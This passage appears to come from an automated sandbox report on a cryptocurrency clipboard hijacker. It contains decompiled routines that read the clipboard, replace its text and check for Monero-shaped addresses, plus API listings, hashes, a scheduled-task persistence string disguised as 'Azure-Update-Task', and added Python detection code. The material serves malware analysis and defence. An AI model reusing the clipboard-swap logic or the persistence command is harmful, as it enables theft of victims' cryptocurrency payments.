                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A110DB2500229ABCB60DFA0DD4CEDB7B6CAB45316F0401A1A36AF2061EB7497C49F64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
			/* Decompiler output from the report; comments added. __ecx = source wide-string buffer,
			   __edx = character count (fastcall-style argument passing). Writes the text to the clipboard. */
			int E00401AD7(void* __ecx, signed int __edx) {
				void* _t3;
				signed int _t6;
				void* _t13;
				void* _t16;
				int _t17;

				_t17 = 2 + __edx * 2;           /* byte size of a UTF-16 string plus its terminator */
				_t16 = __ecx;
				_t3 = GlobalAlloc(2, _t17);     /* 2 == GMEM_MOVEABLE, the allocation type the clipboard expects */
				_t13 = _t3;
				GlobalFix(_t13);                /* 16-bit compatibility export, equivalent to GlobalLock here */
				memcpy(_t3, _t16, _t17);        /* copy the replacement text into the global block */
				GlobalUnWire(_t13);             /* 16-bit compatibility export, equivalent to GlobalUnlock */
				_t6 = OpenClipboard(0);
				if(_t6 == 0) {
					return _t6 | 0xffffffff;    /* -1: clipboard could not be opened */
				}
				EmptyClipboard();
				SetClipboardData(0xd, _t13);    /* 0xd == CF_UNICODETEXT: clipboard now holds the caller's text */
				CloseClipboard();
				GlobalFree(_t13);               /* after SetClipboardData the system owns the block, so this free violates the API contract */
				return 0;
			}

APIs
• GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,00401CCD), ref: 00401AE6
• GlobalFix.KERNEL32(00000000), ref: 00401AF1
• memcpy.NTDLL(00000000), ref: 00401AF8
• GlobalUnWire.KERNEL32(00000000), ref: 00401B02
• OpenClipboard.USER32(00000000), ref: 00401B0A
• EmptyClipboard.USER32 ref: 00401B14
• SetClipboardData.USER32(0000000D,00000000), ref: 00401B1D
• CloseClipboard.USER32 ref: 00401B23
• GlobalFree.KERNEL32 ref: 00401B2A
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
• String ID:
• API String ID: 2518647738-0
• Opcode ID: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
• Instruction ID: 99cc7953c36b9163d40fd3eda38f0c3b9334772042750b8267dfc38c461d4ec0
• Opcode Fuzzy Hash: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
• Instruction Fuzzy Hash: 55F0FEF6601110ABE2002BB4BE4DB5B3F6CEBC9756F010535B306F51A1DA7498148B79
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32 ref: 0041431D
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00414334
• UnhandledExceptionFilter.KERNEL32(00420BEC), ref: 0041433F
• GetCurrentProcess.KERNEL32(C0000409), ref: 0041435D
• TerminateProcess.KERNEL32(00000000), ref: 00414364
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
• Instruction ID: 3b85324b25fa6e122bcd8d2fd14b9e1c915bf2a8df4e9c43ea8155ef528145f4
• Opcode Fuzzy Hash: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
• Instruction Fuzzy Hash: 902124B8910B089BD300EF65FC486897BB4FB58390F81607AEC1987361E3B40681CF8D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Decompiler output from the report; comments added. Reads the current clipboard text and returns it. */
			void* E00401B3B() {
				void* _t3;
				void* _t7;
				void* _t9;

				_t9 = 0;
				if(OpenClipboard(0) != 0) {
					_t3 = GetClipboardData(0xd);    /* 0xd == CF_UNICODETEXT: current clipboard text */
					_t7 = _t3;
					if(_t7 != 0) {
						GlobalFix(_t7);             /* 16-bit compatibility export, equivalent to GlobalLock here */
						_t9 = _t3;                  /* value handed back to the caller (the decompiler shows the handle, not the locked pointer) */
						if(_t9 != 0) {
							GlobalUnWire(_t7);      /* 16-bit compatibility export, equivalent to GlobalUnlock */
						}
					}
					CloseClipboard();
				}
				return _t9;                         /* 0 when the clipboard could not be opened or held no text */
			}

APIs
• OpenClipboard.USER32(00000000), ref: 00401B3F
• GetClipboardData.USER32(0000000D), ref: 00401B4C
• GlobalFix.KERNEL32(00000000), ref: 00401B59
• GlobalUnWire.KERNEL32(00000000), ref: 00401B66
• CloseClipboard.USER32 ref: 00401B6C
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataOpenWire
• String ID:
• API String ID: 1198520892-0
• Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
• Instruction ID: 55b30d85abf3daad0443f3bd262dede7e9ebf4be7780eec4932cf4255b49ec97
• Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
• Instruction Fuzzy Hash: 47E0BF7690152197D2212B75BD0CE5BBE78AFC5B517060136FB05F2265DB38880195AD
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
• Instruction ID: 15b755092a14ef3df0439e88747d0616cace29152525239823e1c00132d6235b
• Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
• Instruction Fuzzy Hash: D0F0C276A005049FDB21CF24C889BBE73F9FBC4215F0446A4D80AE7241D330E942CB50
Uniqueness

Uniqueness Score: -1.00%
APIs
• LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
• LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
• LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
• LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
• LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
• LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
• GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
• GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
• GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
• GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
• GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
• GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
• GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
• GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
• GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
• GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
• GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
• GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
• GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
• GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
• GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
• GetProcAddress.KERNEL32(?,0040384C), ref: 02C613E3
• GetProcAddress.KERNEL32(?,0040385C), ref: 02C613EF
• GetProcAddress.KERNEL32(?,0040386C), ref: 02C61400
• GetProcAddress.KERNEL32(00000000,0040387C), ref: 02C61411
• GetProcAddress.KERNEL32(?,00403890), ref: 02C6141D
• GetProcAddress.KERNEL32(?,0040389C), ref: 02C61431
• GetProcAddress.KERNEL32(?,004038AC), ref: 02C61440
• GetProcAddress.KERNEL32(?,004038B4), ref: 02C61451
• GetProcAddress.KERNEL32(?,004038BC), ref: 02C6145D
• GetProcAddress.KERNEL32(?,004038C4), ref: 02C6146E
• GetProcAddress.KERNEL32(?,004038D4), ref: 02C6147F
• GetProcAddress.KERNEL32(?,004038E8), ref: 02C61490
• GetProcAddress.KERNEL32(?,004038F8), ref: 02C614A1
• GetProcAddress.KERNEL32(?,0040390C), ref: 02C614B2
Memory Dump Source
• Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID:
• API String ID: 2238633743-0
• Opcode ID: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
• Instruction ID: 810410d84f07510b68d2279596a66a4244035fbafc9fc8d3546152a8dc498d68
• Opcode Fuzzy Hash: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
• Instruction Fuzzy Hash: 9451A9F2951310BBC7007FB5AE4DA8A7EFCAA8974771184B7B305F31A1D6B892448B5C
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
• String ID: -$9
• API String ID: 3451365851-1631151375
• Opcode ID: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
• Instruction ID: 653ea854a318213682fef8ef0d7c2510b134a99a2165e43a47bb046c5770e462
• Opcode Fuzzy Hash: 1a9a09d93578db34f9c0d612a98667e564935c5bb814d1e3d5b61f6c27d3800b
• Instruction Fuzzy Hash: 57F138B1D052298FDB24CF58CC89BEEB7B1BB48304F10819AE409A7291D7789EC0CF59
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
• String ID: 9
• API String ID: 3455034128-2366072709
• Opcode ID: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
• Instruction ID: 44260cf9f1c9588520b15a15453b67d017e9ba5cfde90ac40a21584d8801aa82
• Opcode Fuzzy Hash: 4fcff20f53753deb092c499b28c604d23a3b997073a29a194913335518047743
• Instruction Fuzzy Hash: B6F15FF1D042199FDB24CF54CC85BAEB7B5BB45304F1484AAE609B7281D738AE84CF5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 02C6159F
• memset.NTDLL ref: 02C615AF
• LocalAlloc.KERNEL32(00000040,00000308), ref: 02C615BF
  • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
  • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
  • Part of subcall function 02C61FCC: LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
  • Part of subcall function 02C61FCC: GlobalFree.KERNEL32(?), ref: 02C62021
• CreateProcessW.KERNEL32(004039E8,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02C61621
• LocalFree.KERNEL32(?), ref: 02C61630
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C6163F
• LocalFree.KERNEL32(?), ref: 02C6165A
Memory Dump Source
• Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: Local$Free$Alloclstrlenmemset$CreateGlobalObjectProcessSingleWait
• String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$9@
• API String ID: 3199137260-561363415
• Opcode ID: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
• Instruction ID: 02738a5c6a7977df94ccd5fe5479601067bb0b0f3358b419eaace194af235466
• Opcode Fuzzy Hash: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
• Instruction Fuzzy Hash: 7221A4B5900109BFD710EFA4DD89EAF7F7DEB80756F240035B605B6294DBB09F009A69
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,00403030), ref: 02C61DDE
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 02C61DE4
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02C61DF3
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 02C61E14
• LocalAlloc.KERNEL32(00000040,00000000), ref: 02C61E26
• LocalAlloc.KERNEL32(00000040,?,?), ref: 02C61E8A
• lstrlenW.KERNEL32(?,?), ref: 02C61EE9
• LocalFree.KERNEL32(?), ref: 02C61F04
• lstrlenW.KERNEL32(?,?), ref: 02C61F0D
• LocalFree.KERNEL32(?), ref: 02C61F20
• Sleep.KERNEL32(000000E1), ref: 02C61F2B
Memory Dump Source
• Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
• String ID:
• API String ID: 3526352376-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l
• String ID: 9
• API String ID: 306235055-2366072709
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
• String ID: -
• API String ID: 532768033-2547889144
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
• String ID: -
• API String ID: 2232461714-2547889144
Uniqueness Score: -1.00%

APIs
• GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,02C61F1D), ref: 02C61D36
• GlobalFix.KERNEL32(00000000), ref: 02C61D41
• memcpy.NTDLL(00000000), ref: 02C61D48
• GlobalUnWire.KERNEL32(00000000), ref: 02C61D52
• OpenClipboard.USER32(00000000), ref: 02C61D5A
• EmptyClipboard.USER32 ref: 02C61D64
• SetClipboardData.USER32(0000000D,00000000), ref: 02C61D6D
• CloseClipboard.USER32 ref: 02C61D73
• GlobalFree.KERNEL32(00000000), ref: 02C61D7A
Memory Dump Source
• Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
• String ID:
• API String ID: 2518647738-0
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(00421EEC), ref: 00419B70
• GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 00419B7F
• SetSystemTime.KERNEL32(00000000), ref: 00419B87
• GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00419B98
• FreeLibraryAndExitThread.KERNEL32(00000000,00000000), ref: 00419BA2
• FindFirstChangeNotificationA.KERNEL32(00421EFC,00000000,00000000), ref: 00419BB1
• LCMapStringA.KERNEL32(00000000,00000000,00421F1C,00000000,?,00000000), ref: 00419BCB
• TlsGetValue.KERNEL32(00000000), ref: 00419BD3
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: Library$ChangeCurrentDirectoryExitFileFindFirstFreeLoadModuleNameNotificationStringSystemThreadTimeValue
• String ID:
• API String ID: 1784048794-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
• String ID:
• API String ID: 4168457693-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
• String ID:
• API String ID: 909868375-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: '$0$9
• API String ID: 3120068967-269856862
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Clipboard-content check used by the hijacker. Returns non-zero only when the
			   wide string has the shape of a Monero address: 95 (standard) or 106 (integrated)
			   characters, a leading '4', a second character of 'A', 'B' or '0'..'9', and none
			   of the four characters that the Base58 alphabet leaves out ('0', 'O', 'I', 'l').
			   Only the shape is tested; no Base58 decode or checksum is performed.
			   Comments added by the editor; the code and constants are the decompiler's. */
			E00401EF7(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t12;
				short _t13;
				WCHAR* _t14;
				WCHAR* _t15;

				_t14 = __ecx;
				/* 0x5f = 95 and 0x6a = 106 wide characters */
				if(lstrlenW(__ecx) == 0x5f || lstrlenW(_t14) == 0x6a) {
					_t12 = 0x34;                                        /* '4' */
					if( *_t14 != _t12) {
						goto L20;
					} else {
						_t4 = _t14[1] & 0x0000ffff;                     /* second character */
						_t13 = 0x30;                                    /* '0' */
						/* 0x41 'A', 0x42 'B', 0x30..0x39 '0'..'9' */
						if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t13 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == _t12 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
							_t15 =  &(_t14[2]);                         /* remainder after the two-character prefix */
							/* reject '0' (0x30), 'O' (0x4f) and 'I' (0x49) anywhere in the remainder */
							if(StrChrW(_t15, _t13) != 0 || StrChrW(_t15, 0x4f) != 0 || StrChrW(_t15, 0x49) != 0) {
								goto L20;
							} else {
								_t8 = StrChrW(_t15, 0x6c);              /* 'l' */
								if(_t8 != 0) {
									goto L20;
								} else {
									return  &(_t8[0]);                  /* reached only when no rejected character was found */
								}
							}
						} else {
							goto L20;
						}
					}
				} else {
					L20:
					return 0;                                           /* not an address of the expected shape */
				}
			}

Instruction addresses for the listing above, in listing order (0x00000000 where no address is given): 0x00401ef8, 0x00401f04, 0x00401f18, 0x00401f1c, 0x00000000, 0x00401f1e, 0x00401f1e, 0x00401f24, 0x00401f28, 0x00401f62, 0x00401f6e, 0x00000000, 0x00401f8a, 0x00401f8d, 0x00401f95, 0x00000000, 0x00401f97, 0x00401f99, 0x00401f99, 0x00401f95, 0x00000000, 0x00000000, 0x00000000, 0x00401f28, 0x00401f9a, 0x00401f9a, 0x00401f9d, 0x00401f9d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00401809,?,00401CAF), ref: 00401EFB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00401CAF), ref: 00401F07
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,00401CAF), ref: 00401F66
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00401CAF), ref: 00401F73
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,00401CAF), ref: 00401F80
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00401CAF), ref: 00401F8D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
                                                                                                                                                                                          • Instruction ID: 842f13b0e6f61bfd151f82261c12b94fa508ce2ba7f017312a929d1c928bf954
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B116D6114832319DB342A386D88A7F22546BD6755B184C37F206F52F0D33CCD82518E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
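The two routines decompiled in this section, E00401EF7 above and E00402039 further down, decide whether clipboard text is worth replacing purely by its shape: length, the first two characters, and the absence of the characters Base58 omits. No checksum is verified, so the sample will happily swap strings that are not valid addresses at all, and a defender who mirrors the same rules for detection should expect the same false positives. The Python below is an added example written for this report, not code from the sample. It restates both checks with the constants taken from the listings and adds a defender-side heuristic for a clipboard monitor; the function names, the swap heuristic and the sample strings are assumptions, and because the listing of E00402039 is truncated after its third StrChrW call, its check mirrors only the visible part.

```python
"""Shape checks that the decompiled routines E00401EF7 and E00402039 apply
to clipboard text, rewritten in Python. Added example for this report,
not code from the sample. Constants come from the listings; the names,
the swap heuristic and the sample inputs below are assumed."""

# Characters rejected anywhere after the two-character prefix.
# 0x30 '0', 0x4f 'O', 0x49 'I', 0x6c 'l' are exactly the characters that
# Base58 leaves out, so the test is a cheap stand-in for a Base58 check.
MONERO_REJECT = "0OIl"   # E00401EF7 tests all four
DOGE_REJECT = "0OI"      # E00402039: only these three survive in the truncated listing


def _tail_is_clean(text, reject):
    """True when none of the rejected characters occurs after the prefix."""
    tail = text[2:]
    return not any(ch in tail for ch in reject)


def matches_e00401ef7(text):
    """lstrlenW == 0x5f (95) or 0x6a (106); text[0] == '4'; text[1] in A, B, 0-9."""
    if len(text) not in (0x5F, 0x6A):
        return False
    if text[0] != "4":
        return False
    if text[1] not in "AB0123456789":
        return False
    return _tail_is_clean(text, MONERO_REJECT)


def matches_e00402039(text):
    """text[0] == 'D'; lstrlenW == 0x22 (34); text[1] in A-H, J-N, P-U, 5-9."""
    if len(text) != 0x22 or text[0] != "D":
        return False
    if text[1] not in "ABCDEFGHJKLMNPQRSTU56789":
        return False
    return _tail_is_clean(text, DOGE_REJECT)


CHECKS = {
    "E00401EF7 (Monero-shaped)": matches_e00401ef7,
    "E00402039 (Dogecoin-shaped)": matches_e00402039,
}


def classify(text):
    """Name of the first check the string satisfies, or None."""
    for name, check in CHECKS.items():
        if check(text):
            return name
    return None


def is_suspicious_swap(before, after):
    """Defender-side heuristic (assumed, not part of the sample): the clipboard
    held an address-shaped string and now holds a different string of the same
    shape. A hijacker replaces like with like, which is exactly this transition;
    a user pasting unrelated text does not produce it."""
    kind = classify(before)
    return kind is not None and before != after and classify(after) == kind


# Constructed sample inputs; these are not real wallet addresses.
SAMPLE_MONERO = "4A" + "b" * 93            # 95 characters, clean tail
SAMPLE_MONERO_BAD = "4A" + "b" * 92 + "O"  # right length, contains 'O'
SAMPLE_DOGE = "D5" + "x" * 32              # 34 characters, clean tail
SAMPLE_DOGE_BAD = "D1" + "x" * 32          # second character outside the allowed set


if __name__ == "__main__":
    for sample in (SAMPLE_MONERO, SAMPLE_MONERO_BAD, SAMPLE_DOGE, SAMPLE_DOGE_BAD):
        print(sample[:6] + "...", classify(sample))
    print("swap flagged:", is_suspicious_swap(SAMPLE_MONERO, "4B" + "c" * 93))
```

Running a monitor on this heuristic means polling the clipboard and keeping the previous value; the rules above are deliberately as loose as the sample's so that anything the hijacker would touch is also what the monitor watches.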

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A59), ref: 02C6214B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,02C61A59), ref: 02C62157
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A59), ref: 02C621B6
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621C3
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621D0
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction ID: f63b67586383a52337dc7283bea6f5ac8f640931f8808dd44832dce625e51994
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1711406174916116DB342A286DDCF7E367C6BC25AAB1A4427FF86E40B0D714CFC3918B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 0$9
                                                                                                                                                                                          • API String ID: 3120068967-1975997740
                                                                                                                                                                                          • Opcode ID: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction ID: e960a11e4ece91178d3a2e8896ec326cb66e4a59b306e649322599f7164a7816
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41F5B1D05228DFDB24CF98D889BEEB7B5BB44304F20859AD009A7241D778AAC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: '$9
                                                                                                                                                                                          • API String ID: 3120068967-1823400153
                                                                                                                                                                                          • Opcode ID: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
